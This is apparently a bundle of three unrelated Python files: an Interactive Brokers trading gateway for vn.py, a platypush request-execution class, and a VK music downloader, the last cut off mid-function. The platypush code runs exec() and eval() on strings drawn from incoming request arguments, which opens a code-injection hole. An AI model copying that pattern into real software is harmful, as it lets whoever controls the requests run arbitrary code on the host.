ib_gateway.py
"""
IB Symbol Rules
SPY-USD-STK SMART
EUR-USD-CASH IDEALPRO
XAUUSD-USD-CMDTY SMART
ES-202002-USD-FUT GLOBEX
"""
from copy import copy
from datetime import datetime
from queue import Empty
from threading import Thread, Condition
from typing import Optional
import shelve
from tzlocal import get_localzone
from ibapi import comm
from ibapi.client import EClient
from ibapi.common import MAX_MSG_LEN, NO_VALID_ID, OrderId, TickAttrib, TickerId
from ibapi.contract import Contract, ContractDetails
from ibapi.execution import Execution
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.ticktype import TickType, TickTypeEnum
from ibapi.wrapper import EWrapper
from ibapi.errors import BAD_LENGTH
from ibapi.common import BarData as IbBarData
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
BarData,
OrderRequest,
CancelRequest,
SubscribeRequest,
HistoryRequest
)
from vnpy.trader.constant import (
Product,
OrderType,
Direction,
Exchange,
Currency,
Status,
OptionType,
Interval
)
from vnpy.trader.utility import get_file_path
ORDERTYPE_VT2IB = {
OrderType.LIMIT: "LMT",
OrderType.MARKET: "MKT",
OrderType.STOP: "STP"
}
ORDERTYPE_IB2VT = {v: k for k, v in ORDERTYPE_VT2IB.items()}
DIRECTION_VT2IB = {Direction.LONG: "BUY", Direction.SHORT: "SELL"}
DIRECTION_IB2VT = {v: k for k, v in DIRECTION_VT2IB.items()}
DIRECTION_IB2VT["BOT"] = Direction.LONG
DIRECTION_IB2VT["SLD"] = Direction.SHORT
EXCHANGE_VT2IB = {
Exchange.SMART: "SMART",
Exchange.NYMEX: "NYMEX",
Exchange.GLOBEX: "GLOBEX",
Exchange.IDEALPRO: "IDEALPRO",
Exchange.CME: "CME",
Exchange.ICE: "ICE",
Exchange.SEHK: "SEHK",
Exchange.HKFE: "HKFE",
Exchange.CFE: "CFE",
Exchange.NYSE: "NYSE",
Exchange.NASDAQ: "NASDAQ",
Exchange.ARCA: "ARCA"
}
EXCHANGE_IB2VT = {v: k for k, v in EXCHANGE_VT2IB.items()}
STATUS_IB2VT = {
"ApiPending": Status.SUBMITTING,
"PendingSubmit": Status.SUBMITTING,
"PreSubmitted": Status.NOTTRADED,
"Submitted": Status.NOTTRADED,
"ApiCancelled": Status.CANCELLED,
"Cancelled": Status.CANCELLED,
"Filled": Status.ALLTRADED,
"Inactive": Status.REJECTED,
}
PRODUCT_IB2VT = {
"STK": Product.EQUITY,
"CASH": Product.FOREX,
"CMDTY": Product.SPOT,
"FUT": Product.FUTURES,
"OPT": Product.OPTION,
"FOT": Product.OPTION
}
OPTION_VT2IB = {OptionType.CALL: "CALL", OptionType.PUT: "PUT"}
CURRENCY_VT2IB = {
Currency.USD: "USD",
Currency.CNY: "CNY",
Currency.HKD: "HKD",
}
TICKFIELD_IB2VT = {
0: "bid_volume_1",
1: "bid_price_1",
2: "ask_price_1",
3: "ask_volume_1",
4: "last_price",
5: "last_volume",
6: "high_price",
7: "low_price",
8: "volume",
9: "pre_close",
14: "open_price",
}
ACCOUNTFIELD_IB2VT = {
"NetLiquidationByCurrency": "balance",
"NetLiquidation": "balance",
"UnrealizedPnL": "positionProfit",
"AvailableFunds": "available",
"MaintMarginReq": "margin",
}
INTERVAL_VT2IB = {
Interval.MINUTE: "1 min",
Interval.HOUR: "1 hour",
Interval.DAILY: "1 day",
}
JOIN_SYMBOL = "-"
class IbGateway(BaseGateway):
""""""
default_setting = {
"TWS地址": "127.0.0.1",
"TWS端口": 7497,
"客户号": 1,
"交易账户": ""
}
exchanges = list(EXCHANGE_VT2IB.keys())
def __init__(self, event_engine):
""""""
super().__init__(event_engine, "IB")
self.api = IbApi(self)
def connect(self, setting: dict):
"""
Start gateway connection.
"""
host = setting["TWS地址"]
port = setting["TWS端口"]
clientid = setting["客户号"]
account = setting["交易账户"]
self.api.connect(host, port, clientid, account)
def close(self):
"""
Close gateway connection.
"""
self.api.close()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
self.api.subscribe(req)
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
return self.api.send_order(req)
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
self.api.cancel_order(req)
def query_account(self):
"""
Query account balance.
"""
pass
def query_position(self):
"""
Query holding positions.
"""
pass
def query_history(self, req: HistoryRequest):
""""""
return self.api.query_history(req)
class IbApi(EWrapper):
""""""
data_filename = "ib_contract_data.db"
data_filepath = str(get_file_path(data_filename))
local_tz = get_localzone()
def __init__(self, gateway: BaseGateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.status = False
self.reqid = 0
self.orderid = 0
self.clientid = 0
self.account = ""
self.ticks = {}
self.orders = {}
self.accounts = {}
self.contracts = {}
self.tick_exchange = {}
self.history_req = None
self.history_condition = Condition()
self.history_buf = []
self.client = IbClient(self)
self.thread = Thread(target=self.client.run)
def connectAck(self): # pylint: disable=invalid-name
"""
Callback when connection is established.
"""
self.status = True
self.gateway.write_log("IB TWS连接成功")
self.load_contract_data()
def connectionClosed(self): # pylint: disable=invalid-name
"""
Callback when connection is closed.
"""
self.status = False
self.gateway.write_log("IB TWS连接断开")
def nextValidId(self, orderId: int): # pylint: disable=invalid-name
"""
Callback of next valid orderid.
"""
super().nextValidId(orderId)
if not self.orderid:
self.orderid = orderId
def currentTime(self, time: int): # pylint: disable=invalid-name
"""
Callback of current server time of IB.
"""
super().currentTime(time)
dt = datetime.fromtimestamp(time)
time_string = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
msg = f"服务器时间: {time_string}"
self.gateway.write_log(msg)
def error(
self, reqId: TickerId, errorCode: int, errorString: str
): # pylint: disable=invalid-name
"""
Callback of error caused by specific request.
"""
super().error(reqId, errorCode, errorString)
msg = f"信息通知,代码:{errorCode},内容: {errorString}"
self.gateway.write_log(msg)
def tickPrice( # pylint: disable=invalid-name
self, reqId: TickerId, tickType: TickType, price: float, attrib: TickAttrib
):
"""
Callback of tick price update.
"""
super().tickPrice(reqId, tickType, price, attrib)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, price)
# Update name into tick data.
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
# Forex and spot product of IDEALPRO has no tick time and last price.
# We need to calculate locally.
exchange = self.tick_exchange[reqId]
if exchange is Exchange.IDEALPRO:
tick.last_price = (tick.bid_price_1 + tick.ask_price_1) / 2
tick.datetime = datetime.now(self.local_tz)
self.gateway.on_tick(copy(tick))
def tickSize(
self, reqId: TickerId, tickType: TickType, size: int
): # pylint: disable=invalid-name
"""
Callback of tick volume update.
"""
super().tickSize(reqId, tickType, size)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, size)
self.gateway.on_tick(copy(tick))
def tickString(
self, reqId: TickerId, tickType: TickType, value: str
): # pylint: disable=invalid-name
"""
Callback of tick string update.
"""
super().tickString(reqId, tickType, value)
if tickType != TickTypeEnum.LAST_TIMESTAMP:
return
tick = self.ticks[reqId]
dt = datetime.fromtimestamp(int(value))
tick.datetime = dt.replace(tzinfo=self.local_tz)
self.gateway.on_tick(copy(tick))
def orderStatus( # pylint: disable=invalid-name
self,
orderId: OrderId,
status: str,
filled: float,
remaining: float,
avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float,
):
"""
Callback of order status update.
"""
super().orderStatus(
orderId,
status,
filled,
remaining,
avgFillPrice,
permId,
parentId,
lastFillPrice,
clientId,
whyHeld,
mktCapPrice,
)
        orderid = str(orderId)
        order = self.orders.get(orderid, None)
        if not order:
            return
        order.traded = filled
# To filter PendingCancel status
order_status = STATUS_IB2VT.get(status, None)
if order_status:
order.status = order_status
self.gateway.on_order(copy(order))
def openOrder( # pylint: disable=invalid-name
self,
orderId: OrderId,
ib_contract: Contract,
ib_order: Order,
orderState: OrderState,
):
"""
Callback when opening new order.
"""
super().openOrder(
orderId, ib_contract, ib_order, orderState
)
orderid = str(orderId)
order = OrderData(
symbol=ib_contract.conId,
exchange=EXCHANGE_IB2VT.get(
ib_contract.exchange, ib_contract.exchange),
type=ORDERTYPE_IB2VT[ib_order.orderType],
orderid=orderid,
direction=DIRECTION_IB2VT[ib_order.action],
volume=ib_order.totalQuantity,
gateway_name=self.gateway_name,
)
if order.type == OrderType.LIMIT:
order.price = ib_order.lmtPrice
elif order.type == OrderType.STOP:
order.price = ib_order.auxPrice
self.orders[orderid] = order
self.gateway.on_order(copy(order))
def updateAccountValue( # pylint: disable=invalid-name
self, key: str, val: str, currency: str, accountName: str
):
"""
Callback of account update.
"""
super().updateAccountValue(key, val, currency, accountName)
if not currency or key not in ACCOUNTFIELD_IB2VT:
return
accountid = f"{accountName}.{currency}"
account = self.accounts.get(accountid, None)
if not account:
account = AccountData(accountid=accountid,
gateway_name=self.gateway_name)
self.accounts[accountid] = account
name = ACCOUNTFIELD_IB2VT[key]
setattr(account, name, float(val))
def updatePortfolio( # pylint: disable=invalid-name
self,
contract: Contract,
position: float,
marketPrice: float,
marketValue: float,
averageCost: float,
unrealizedPNL: float,
realizedPNL: float,
accountName: str,
):
"""
Callback of position update.
"""
super().updatePortfolio(
contract,
position,
marketPrice,
marketValue,
averageCost,
unrealizedPNL,
realizedPNL,
accountName,
)
if contract.exchange:
exchange = EXCHANGE_IB2VT.get(contract.exchange, None)
elif contract.primaryExchange:
exchange = EXCHANGE_IB2VT.get(contract.primaryExchange, None)
else:
exchange = Exchange.SMART # Use smart routing for default
if not exchange:
msg = f"存在不支持的交易所持仓{contract.conId} {contract.exchange} {contract.primaryExchange}"
self.gateway.write_log(msg)
return
        try:
            ib_size = int(contract.multiplier)
        except (ValueError, TypeError):     # multiplier may be None or empty
            ib_size = 1
price = averageCost / ib_size
pos = PositionData(
symbol=generate_symbol(contract),
exchange=exchange,
direction=Direction.NET,
volume=position,
price=price,
pnl=unrealizedPNL,
gateway_name=self.gateway_name,
)
self.gateway.on_position(pos)
def updateAccountTime(self, timeStamp: str): # pylint: disable=invalid-name
"""
Callback of account update time.
"""
super().updateAccountTime(timeStamp)
for account in self.accounts.values():
self.gateway.on_account(copy(account))
def contractDetails(self, reqId: int, contractDetails: ContractDetails): # pylint: disable=invalid-name
"""
Callback of contract data update.
"""
super().contractDetails(reqId, contractDetails)
# Generate symbol from ib contract details
ib_contract = contractDetails.contract
if not ib_contract.multiplier:
ib_contract.multiplier = 1
symbol = generate_symbol(ib_contract)
# Generate contract
contract = ContractData(
symbol=symbol,
exchange=EXCHANGE_IB2VT[ib_contract.exchange],
name=contractDetails.longName,
product=PRODUCT_IB2VT[ib_contract.secType],
size=ib_contract.multiplier,
pricetick=contractDetails.minTick,
net_position=True,
history_data=True,
stop_supported=True,
gateway_name=self.gateway_name,
)
if contract.vt_symbol not in self.contracts:
self.gateway.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
self.save_contract_data()
def execDetails(
self, reqId: int, contract: Contract, execution: Execution
): # pylint: disable=invalid-name
"""
Callback of trade data update.
"""
super().execDetails(reqId, contract, execution)
dt = datetime.strptime(execution.time, "%Y%m%d %H:%M:%S")
dt = dt.replace(tzinfo=self.local_tz)
trade = TradeData(
symbol=contract.conId,
exchange=EXCHANGE_IB2VT.get(contract.exchange, contract.exchange),
orderid=str(execution.orderId),
tradeid=str(execution.execId),
direction=DIRECTION_IB2VT[execution.side],
price=execution.price,
volume=execution.shares,
datetime=dt,
gateway_name=self.gateway_name,
)
self.gateway.on_trade(trade)
def managedAccounts(self, accountsList: str):
"""
Callback of all sub accountid.
"""
super().managedAccounts(accountsList)
if not self.account:
for account_code in accountsList.split(","):
self.account = account_code
self.gateway.write_log(f"当前使用的交易账号为{self.account}")
self.client.reqAccountUpdates(True, self.account)
def historicalData(self, reqId: int, ib_bar: IbBarData):
"""
Callback of history data update.
"""
        # Daily bars carry only a date, intraday bars a date and a time.
        if ":" in ib_bar.date:
            dt = datetime.strptime(ib_bar.date, "%Y%m%d %H:%M:%S")
        else:
            dt = datetime.strptime(ib_bar.date, "%Y%m%d")
dt = dt.replace(tzinfo=self.local_tz)
bar = BarData(
symbol=self.history_req.symbol,
exchange=self.history_req.exchange,
datetime=dt,
interval=self.history_req.interval,
volume=ib_bar.volume,
open_price=ib_bar.open,
high_price=ib_bar.high,
low_price=ib_bar.low,
close_price=ib_bar.close,
gateway_name=self.gateway_name
)
self.history_buf.append(bar)
def historicalDataEnd(self, reqId: int, start: str, end: str):
"""
Callback of history data finished.
"""
self.history_condition.acquire()
self.history_condition.notify()
self.history_condition.release()
def connect(self, host: str, port: int, clientid: int, account: str):
"""
Connect to TWS.
"""
if self.status:
return
self.clientid = clientid
self.account = account
self.client.connect(host, port, clientid)
self.thread.start()
self.client.reqCurrentTime()
def close(self):
"""
        Disconnect from TWS.
"""
if not self.status:
return
self.status = False
self.client.disconnect()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
if not self.status:
return
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所{req.exchange}")
return
# Extract ib contract detail
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
self.gateway.write_log("代码解析失败,请检查格式是否正确")
return
# Get contract data from TWS.
self.reqid += 1
self.client.reqContractDetails(self.reqid, ib_contract)
# Subscribe tick data and create tick object buffer.
self.reqid += 1
self.client.reqMktData(self.reqid, ib_contract, "", False, False, [])
tick = TickData(
symbol=req.symbol,
exchange=req.exchange,
datetime=datetime.now(self.local_tz),
gateway_name=self.gateway_name,
)
self.ticks[self.reqid] = tick
self.tick_exchange[self.reqid] = req.exchange
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
if not self.status:
return ""
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所:{req.exchange}")
return ""
if req.type not in ORDERTYPE_VT2IB:
self.gateway.write_log(f"不支持的价格类型:{req.type}")
return ""
self.orderid += 1
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
return ""
ib_order = Order()
ib_order.orderId = self.orderid
ib_order.clientId = self.clientid
ib_order.action = DIRECTION_VT2IB[req.direction]
ib_order.orderType = ORDERTYPE_VT2IB[req.type]
ib_order.totalQuantity = req.volume
ib_order.account = self.account
if req.type == OrderType.LIMIT:
ib_order.lmtPrice = req.price
elif req.type == OrderType.STOP:
ib_order.auxPrice = req.price
self.client.placeOrder(self.orderid, ib_contract, ib_order)
self.client.reqIds(1)
order = req.create_order_data(str(self.orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
if not self.status:
return
self.client.cancelOrder(int(req.orderid))
def query_history(self, req: HistoryRequest):
""""""
self.history_req = req
self.reqid += 1
ib_contract = generate_ib_contract(req.symbol, req.exchange)
if req.end:
end = req.end
end_str = end.strftime("%Y%m%d %H:%M:%S")
else:
end = datetime.now()
end_str = ""
delta = end - req.start
        days = max(1, min(delta.days, 180))  # IB only provides 6-month data; at least 1 day
duration = f"{days} D"
bar_size = INTERVAL_VT2IB[req.interval]
if req.exchange == Exchange.IDEALPRO:
bar_type = "MIDPOINT"
else:
bar_type = "TRADES"
self.client.reqHistoricalData(
self.reqid,
ib_contract,
end_str,
duration,
bar_size,
bar_type,
1,
1,
False,
[]
)
self.history_condition.acquire() # Wait for async data return
self.history_condition.wait()
self.history_condition.release()
history = self.history_buf
self.history_buf = [] # Create new buffer list
self.history_req = None
return history
def load_contract_data(self):
""""""
f = shelve.open(self.data_filepath)
self.contracts = f.get("contracts", {})
f.close()
for contract in self.contracts.values():
self.gateway.on_contract(contract)
self.gateway.write_log("本地缓存合约信息加载成功")
def save_contract_data(self):
""""""
f = shelve.open(self.data_filepath)
f["contracts"] = self.contracts
f.close()
class IbClient(EClient):
""""""
def run(self):
"""
Reimplement the original run message loop of eclient.
Remove all unnecessary try...catch... and allow exceptions to interrupt loop.
"""
while not self.done and self.isConnected():
try:
text = self.msg_queue.get(block=True, timeout=0.2)
if len(text) > MAX_MSG_LEN:
errorMsg = "%s:%d:%s" % (BAD_LENGTH.msg(), len(text), text)
self.wrapper.error(
NO_VALID_ID, BAD_LENGTH.code(), errorMsg
)
self.disconnect()
break
fields = comm.read_fields(text)
self.decoder.interpret(fields)
except Empty:
pass
def generate_ib_contract(symbol: str, exchange: Exchange) -> Optional[Contract]:
""""""
try:
fields = symbol.split(JOIN_SYMBOL)
ib_contract = Contract()
ib_contract.exchange = EXCHANGE_VT2IB[exchange]
ib_contract.secType = fields[-1]
ib_contract.currency = fields[-2]
ib_contract.symbol = fields[0]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
ib_contract.lastTradeDateOrContractMonth = fields[1]
if ib_contract.secType in ["OPT", "FOP"]:
ib_contract.right = fields[2]
ib_contract.strike = float(fields[3])
ib_contract.multiplier = int(fields[4])
    except (IndexError, ValueError):
ib_contract = None
return ib_contract
def generate_symbol(ib_contract: Contract) -> str:
""""""
fields = [ib_contract.symbol]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
fields.append(ib_contract.lastTradeDateOrContractMonth)
if ib_contract.secType in ["OPT", "FOP"]:
fields.append(ib_contract.right)
fields.append(str(ib_contract.strike))
fields.append(str(ib_contract.multiplier))
fields.append(ib_contract.currency)
fields.append(ib_contract.secType)
symbol = JOIN_SYMBOL.join(fields)
return symbol
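
A minimal round-trip sketch of the two module-level helpers above, following the "IB Symbol Rules" from the module docstring (Exchange.GLOBEX is one of the members mapped in EXCHANGE_VT2IB):

from vnpy.trader.constant import Exchange

# Parse a vn.py symbol string into an IB Contract...
ib_contract = generate_ib_contract("ES-202002-USD-FUT", Exchange.GLOBEX)
print(ib_contract.symbol, ib_contract.secType)   # -> ES FUT

# ...and rebuild the same symbol string from the Contract.
print(generate_symbol(ib_contract))              # -> ES-202002-USD-FUT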
__init__.py
import copy
import datetime
import json
import logging
import random
import re
import time
from threading import Thread
from platypush.config import Config
from platypush.context import get_plugin
from platypush.message import Message
from platypush.message.response import Response
from platypush.utils import get_hash, get_module_and_method_from_action, get_redis_queue_name_by_message, \
is_functional_procedure
logger = logging.getLogger('platypush')
class Request(Message):
""" Request message class """
def __init__(self, target, action, origin=None, id=None, backend=None,
args=None, token=None, timestamp=None):
"""
Params:
target -- Target node [Str]
action -- Action to be executed (e.g. music.mpd.play) [Str]
origin -- Origin node [Str]
id -- Message ID, or None to get it auto-generated
backend -- Backend connected to the request, where the response will be delivered
args -- Additional arguments for the action [Dict]
token -- Authorization token, if required on the server [Str]
timestamp -- Message creation timestamp [Float]
"""
super().__init__(timestamp=timestamp)
self.id = id if id else self._generate_id()
self.target = target
self.action = action
self.origin = origin
self.args = args if args else {}
self.backend = backend
self.token = token
@classmethod
def build(cls, msg):
msg = super().parse(msg)
args = {'target': msg.get('target', Config.get('device_id')), 'action': msg['action'],
'args': msg.get('args', {}), 'id': msg['id'] if 'id' in msg else cls._generate_id(),
'timestamp': msg['_timestamp'] if '_timestamp' in msg else time.time()}
if 'origin' in msg:
args['origin'] = msg['origin']
if 'token' in msg:
args['token'] = msg['token']
return cls(**args)
@staticmethod
def _generate_id():
_id = ''
for i in range(0, 16):
_id += '%.2x' % random.randint(0, 255)
return _id
def _execute_procedure(self, *args, **kwargs):
from platypush.config import Config
from platypush.procedure import Procedure
logger.info('Executing procedure request: {}'.format(self.action))
procedures = Config.get_procedures()
proc_name = '.'.join(self.action.split('.')[1:])
if proc_name not in procedures:
proc_name = self.action.split('.')[-1]
proc_config = procedures[proc_name]
if is_functional_procedure(proc_config):
kwargs.update(**self.args)
if 'n_tries' in kwargs:
del kwargs['n_tries']
return proc_config(*args, **kwargs)
proc = Procedure.build(name=proc_name, requests=proc_config['actions'],
_async=proc_config['_async'], args=self.args,
backend=self.backend, id=self.id)
return proc.execute(*args, **kwargs)
def _expand_context(self, event_args=None, **context):
from platypush.config import Config
if event_args is None:
event_args = copy.deepcopy(self.args)
constants = Config.get_constants()
context['constants'] = {}
for (name, value) in constants.items():
context['constants'][name] = value
keys = []
if isinstance(event_args, dict):
keys = event_args.keys()
elif isinstance(event_args, list):
keys = range(0, len(event_args))
for key in keys:
value = event_args[key]
if isinstance(value, str):
value = self.expand_value_from_context(value, **context)
elif isinstance(value, dict) or isinstance(value, list):
self._expand_context(event_args=value, **context)
event_args[key] = value
return event_args
# noinspection PyBroadException
@classmethod
def expand_value_from_context(cls, _value, **context):
for (k, v) in context.items():
if isinstance(v, Message):
v = json.loads(str(v))
try:
exec('{}={}'.format(k, v))
except:
if isinstance(v, str):
try:
                        exec('{}="{}"'.format(k, re.sub('(^|[^\\\\])"', '\\1\\"', v)))
except:
pass
parsed_value = ''
if not isinstance(_value, str):
parsed_value = _value
while _value and isinstance(_value, str):
m = re.match('([^$]*)(\${\s*(.+?)\s*})(.*)', _value)
if m and not m.group(1).endswith('\\'):
prefix = m.group(1)
expr = m.group(2)
inner_expr = m.group(3)
_value = m.group(4)
try:
context_value = eval(inner_expr)
if callable(context_value):
context_value = context_value()
if isinstance(context_value, range) or isinstance(context_value, tuple):
context_value = [*context_value]
if isinstance(context_value, datetime.date):
context_value = context_value.isoformat()
except Exception as e:
logger.exception(e)
context_value = expr
parsed_value += prefix + (
json.dumps(context_value)
if isinstance(context_value, list) or isinstance(context_value, dict)
else str(context_value)
)
else:
parsed_value += _value
_value = ''
try:
return json.loads(parsed_value)
except:
return parsed_value
def _send_response(self, response):
response = Response.build(response)
response.id = self.id
response.target = self.origin
response.origin = Config.get('device_id')
if self.backend and self.origin:
self.backend.send_response(response=response, request=self)
else:
redis = get_plugin('redis')
if redis:
queue_name = get_redis_queue_name_by_message(self)
redis.send_message(queue_name, response)
redis.expire(queue_name, 60)
def execute(self, n_tries=1, _async=True, **context):
"""
        Executes this request and returns a Response object.
        Params:
            n_tries -- Number of tries in case of failure before raising a RuntimeError
            _async  -- If True, the request will be run asynchronously and the
                       response posted on the bus when available (default),
                       otherwise the current thread will wait for the response
                       to be returned synchronously.
            context -- Key-valued context. Example:
                context = dict(group_name='Kitchen lights')
                request.args:
                    - group: ${group_name} # will be expanded as "Kitchen lights"
"""
def _thread_func(_n_tries, errors=None):
response = None
if self.action.startswith('procedure.'):
context['n_tries'] = _n_tries
response = self._execute_procedure(**context)
if response is not None:
self._send_response(response)
return response
# utils.get_context is a special action that simply returns the current context
elif self.action == 'utils.get_context':
response = Response(output=context)
self._send_response(response)
return response
else:
action = self.expand_value_from_context(self.action, **context)
(module_name, method_name) = get_module_and_method_from_action(action)
plugin = get_plugin(module_name)
try:
# Run the action
args = self._expand_context(**context)
args = self.expand_value_from_context(args, **context)
if isinstance(args, dict):
response = plugin.run(method_name, **args)
elif isinstance(args, list):
response = plugin.run(method_name, *args)
else:
response = plugin.run(method_name, args)
if not response:
logger.warning('Received null response from action {}'.format(action))
else:
if response.is_error():
logger.warning(('Response processed with errors from ' +
'action {}: {}').format(
action, str(response)))
elif not response.disable_logging:
logger.info('Processed response from action {}: {}'.
format(action, str(response)))
except AssertionError as e:
plugin.logger.exception(e)
logger.warning('Assertion error from action [{}]: {}'.format(action, str(e)))
response = Response(output=None, errors=[str(e)])
except Exception as e:
# Retry mechanism
plugin.logger.exception(e)
logger.warning(('Uncaught exception while processing response ' +
'from action [{}]: {}').format(action, str(e)))
errors = errors or []
if str(e) not in errors:
errors.append(str(e))
response = Response(output=None, errors=errors)
if _n_tries - 1 > 0:
logger.info('Reloading plugin {} and retrying'.format(module_name))
get_plugin(module_name, reload=True)
response = _thread_func(_n_tries=_n_tries-1, errors=errors)
finally:
self._send_response(response)
return response
token_hash = Config.get('token_hash')
if token_hash:
if self.token is None or get_hash(self.token) != token_hash:
raise PermissionError()
if _async:
Thread(target=_thread_func, args=(n_tries,)).start()
else:
return _thread_func(n_tries)
def __str__(self):
"""
Overrides the str() operator and converts
the message into a UTF-8 JSON string
"""
return json.dumps({
'type': 'request',
'target': self.target,
'action': self.action,
'args': self.args,
'origin': self.origin if hasattr(self, 'origin') else None,
'id': self.id if hasattr(self, 'id') else None,
'token': self.token if hasattr(self, 'token') else None,
'_timestamp': self.timestamp,
})
# vim:sw=4:ts=4:et:
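
A minimal sketch of how a Request is built and executed against a running platypush instance (the device id, plugin action, and context key below are illustrative assumptions, not values from this module):

request = Request.build({
    'type': 'request',
    'target': 'my-device',            # hypothetical device_id
    'action': 'music.mpd.play',       # assumes the music.mpd plugin is configured
    'args': {'resource': '${uri}'},   # placeholder resolved by expand_value_from_context()
})

# Run synchronously; ${uri} is expanded from the keyword context.
response = request.execute(_async=False, uri='file:///tmp/song.mp3')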
vk_music.py
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
from collections import Counter
import os
import json
from six.moves import queue as Queue  # Py2/Py3 compatible
import threading
import traceback
from six.moves import input as read_input
from six.moves import urllib
from .utils import prnt, print_out, replace_chars
from .exceptions import *
from .consts import SAVED, SKIPPED
class Song(object):
"""
Just wrapper for interactions with storage
As functionality extending shown black_list feature
"""
def __init__(self, storage, song=None, *args, **kwargs):
"""
Init object
Prepare song name as self.name
@param storage: Song storage
@param song: Dict with artist, title and url fields or only name
@param args:
@param kwargs:
@raise TypeError:
"""
self.storage = storage
self.manager = kwargs.get('manager', None)
# Process song dict to class props
try:
self.name = song.get('name', None) or ('%s - %s.mp3' % (song['artist'].strip(), song['title'].strip()))
self.name = replace_chars(self.name, ('/', '\\', '?', '%', '*', ':', '|', '"', '<', '>', ';', '!'))
self.name = os.path.normpath(self.name)
        except KeyError:
            raise TypeError('To create a "Song" object you must provide a '
                            '"song" dict with a name, or artist and title')
self.url = song.get('url', None)
def save(self, **kwargs):
"""
Save song
Download from self.url and save to self.path with self.name
"""
        if not self.url:
            raise RuntimeError('Can not load song: no url')
# r means remote file
r = urllib.request.urlopen(self.url)
# Such kind of manipulation need later in case of errors and broken files
return self.storage.write(self.name, r)
def remove(self):
"""
Remove file
"""
self.storage.remove(self.name)
def in_blacklist(self):
"""
        Check whether the song is blacklisted and therefore must not be
        downloaded and saved. Returns True if blacklisted.
"""
return self.name.strip()[-8:-4] == r'-bl-'
class VkMusic(object):
# ToDo: Implement verbosity level
song_class = Song
def __init__(self, storage, *args, **kwargs):
"""
song_class=Song
Updates self.SETTINGS from kwargs
"""
self.storage = storage
self.SETTINGS = {
'client_id': None,
'uid': None,
'gid': None,
'from': 0,
'to': None,
'token_dir': '~/.vk-music',
'redirect_url': 'http://sima.pro/public/token.html',
'threads': 2
}
self.SETTINGS.update(kwargs)
# Process ~ inside path and create directory for data
self.SETTINGS['token_dir'] = os.path.expanduser(self.SETTINGS['token_dir'])
try:
os.makedirs(self.SETTINGS['token_dir'])
except OSError as e:
if e.errno != 17:
self.exit('Can\'t create data directory: %s' % e)
if (not self.SETTINGS['uid'] and not self.SETTINGS['gid']) or not self.SETTINGS['client_id']:
raise ValueError('You must provide client_id and uid or gid')
if kwargs.get('song_class'):
self.song_class = kwargs.get('song_class')
def __enter__(self):
if self.storage.exists('.lock') and not self.SETTINGS.get('force', False):
raise AlreadyRunningError()
else:
self.storage.touch('.lock')
return self
def __exit__(self, exc_type=None, exc_val=None, exc_tb=None):
try:
self.storage.remove('.lock')
except Exception as e:
print('Error in exit: %s' % e)
if exc_type:
print_out(exc_type, exc_val, exc_tb)
def get_api_url(self):
"""
Get URL for api requests
"""
try:
token = self.get_token()
except Exception as e:
            self.exit('Problems while getting token: %s' % e)
url = 'https://api.vk.com/method/audio.get.json?uid=%s&access_token=%s'\
%\
(self.SETTINGS['uid'], token)
if self.SETTINGS['gid']:
url += '&gid=' + self.SETTINGS['gid']
return url
@property
def token_file(self):
return os.path.join(self.SETTINGS['token_dir'], 'token.txt')
def clear_token(self):
os.remove(self.token_file)
def store_token(self, token):
open(self.token_file, 'w').write(token)
def get_token(self, force_new=False):
if self.SETTINGS.get('token') and not force_new:
return self.SETTINGS.get('token')
try:
token = open(self.token_file, 'r').read()
except IOError:
token_url = 'https://oauth.vk.com/authorize?client_id=%(client_id)s&scope=audio,offline&redirect_uri=' \
'%(redirect_url)s&display=page&response_type=token' % self.SETTINGS
print_out("Open this URL in browser: %s\n"
"Then copy token from url: " % token_url, end="")
token = read_input()
self.store_token(token)
return token
def get_songs(self):
"""
Get songs to be downloaded
"""
s_from = self.SETTINGS['from']
s_to = self.SETTINGS['to']
retries = 3
while retries:
response = json.loads(urllib.request.urlopen(self.get_api_url()).read())
try:
response['count'] = len(response['response'])
response['response'] = response['response'][s_from:s_to]
break
except KeyError:
# Clear old token and get new
print_out('Error while fetching music, response: {}'.format(response))
self.clear_token()
self.get_token(force_new=True)
retries -= 1
return response
def synchronize(self):
"""
        Main function that does the job according to the configuration,
        e.g.:
obj = VkMusic()
obj.synchronize()
"""
stats = Counter()
print_out('Fetching music list...')
songs = self.get_songs()
to_sync = {
'new': [],
'old': self.storage.files_list()
}
print_out('Starting download list to "%s"...' % self.storage.get_id())
status_stats = {
SAVED: 'saved',
SKIPPED: 'skipped'
}
# Setup queue for songs
queue = Queue.Queue()
def worker(): # Setup worker that will do all the work
            while True:  # loop forever; queue.get() blocks until a task arrives
try:
idx, song = queue.get()
print_out('{}. Downloading: {}'.format(idx, song.name))
status = song.save()
text_status = status_stats[status]
stats[text_status] += 1
print_out('{}. {}: {}'.format(idx, text_status.capitalize(), song.name))
                except (OSError, urllib.error.HTTPError) as e:
                    print_out("Error %d: %s, %s" % (idx, song.name, str(e)))
                except Exception:
                    print_out("Critical error (please fill issue) %d: %s, %s" % (idx, song.name, traceback.format_exc()))
